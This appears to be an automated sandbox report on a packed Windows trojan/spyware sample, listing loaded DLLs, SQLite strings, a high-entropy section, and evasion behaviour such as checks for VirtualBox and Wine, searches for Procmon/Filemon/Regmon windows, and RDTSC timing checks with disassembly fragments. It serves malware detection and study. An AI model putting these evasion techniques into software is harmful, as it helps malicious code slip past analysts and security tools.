              Source: file.exeStatic PE information: Section: pxgxvnlp ZLIB complexity 0.9949553329854669
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/6@0/1
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KAXVOMTB.htmJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3424
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\633db15d-32df-4a6f-83e6-adb215d649b3Jump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
              Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: file.exe, 00000000.00000002.2821491143.0000000061E00000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2818939342.000000001D853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: file.exeVirustotal: Detection: 41%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1600
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1751552 > 1048576
              Source: file.exeStatic PE information: Raw size of pxgxvnlp is bigger than: 0x100000 < 0x194400

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.320000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pxgxvnlp:EW;bshzvtbg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pxgxvnlp:EW;bshzvtbg:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b0ae6 should be: 0x1b4d45
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: pxgxvnlp
              Source: file.exeStatic PE information: section name: bshzvtbg
              Source: file.exeStatic PE information: section name: .taggant
              Source: file.exeStatic PE information: section name: pxgxvnlp entropy: 7.954604201720513

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DD38B second address: 6DD3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jc 00007F56AD341B16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DD3A8 second address: 6DD3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F56ACB76F36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC696 second address: 6DC6A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F56AD341B16h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC94C second address: 6DC95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DCC01 second address: 6DCC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F56AD341B22h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F56AD341B48h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E04B1 second address: 6E04E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jns 00007F56ACB76F44h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E04E4 second address: 6E04E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0724 second address: 6E072E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F56ACB76F36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0816 second address: 6E081A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E08CF second address: 6E08D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E08D3 second address: 6E08D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E08D9 second address: 6E097D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F56ACB76F48h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 2477420Ah 0x00000012 stc 0x00000013 push 00000003h 0x00000015 movsx esi, dx 0x00000018 push 00000000h 0x0000001a cmc 0x0000001b push 00000003h 0x0000001d ja 00007F56ACB76F39h 0x00000023 mov edi, dword ptr [ebp+122D398Bh] 0x00000029 call 00007F56ACB76F39h 0x0000002e jno 00007F56ACB76F56h 0x00000034 push eax 0x00000035 jmp 00007F56ACB76F3Dh 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e jnl 00007F56ACB76F44h 0x00000044 mov eax, dword ptr [eax] 0x00000046 push eax 0x00000047 push edx 0x00000048 jg 00007F56ACB76F3Ch 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E097D second address: 6E09D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F56AD341B18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007F56AD341B20h 0x00000013 pop eax 0x00000014 mov esi, 25841C13h 0x00000019 pushad 0x0000001a mov edx, dword ptr [ebp+122D18B7h] 0x00000020 mov edi, dword ptr [ebp+122D39BBh] 0x00000026 popad 0x00000027 lea ebx, dword ptr [ebp+124503C3h] 0x0000002d movzx esi, si 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F56AD341B28h 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE8D8 second address: 6FE8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE8DE second address: 6FE8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F56AD341B23h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEBFB second address: 6FEC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Fh 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEC0F second address: 6FEC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F56AD341B16h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FED94 second address: 6FED98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FED98 second address: 6FED9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FED9E second address: 6FEDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEECB second address: 6FEEF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Bh 0x00000007 ja 00007F56AD341B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F56AD341B1Dh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEEF1 second address: 6FEEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEEF5 second address: 6FEF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56AD341B22h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEF0F second address: 6FEF47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F56ACB76F36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F56ACB76F36h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F56ACB76F3Fh 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F56ACB76F42h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF0D1 second address: 6FF0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF22B second address: 6FF233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF233 second address: 6FF244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B1Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF369 second address: 6FF36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF36F second address: 6FF375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1FF0 second address: 6C1FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1FF4 second address: 6C1FFE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F56AD341B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1FFE second address: 6C2004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF7A1 second address: 6FF7BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56AD341B22h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF7BB second address: 6FF7BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFD97 second address: 6FFDC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F56AD341B1Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F56AD341B29h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFDC3 second address: 6FFDC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF2F second address: 6FFF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F56AD341B1Eh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF43 second address: 6FFF5A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F56ACB76F38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F56ACB76F36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF5A second address: 6FFF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFF5E second address: 6FFF62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D80D5 second address: 6D80E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B1Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709ABD second address: 709ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709C39 second address: 709C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709C3F second address: 709C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709C43 second address: 709C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f ja 00007F56AD341B16h 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709C59 second address: 709C5E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708C26 second address: 708C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D85B second address: 70D875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F56ACB76F41h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CD71 second address: 70CD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D579 second address: 70D57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
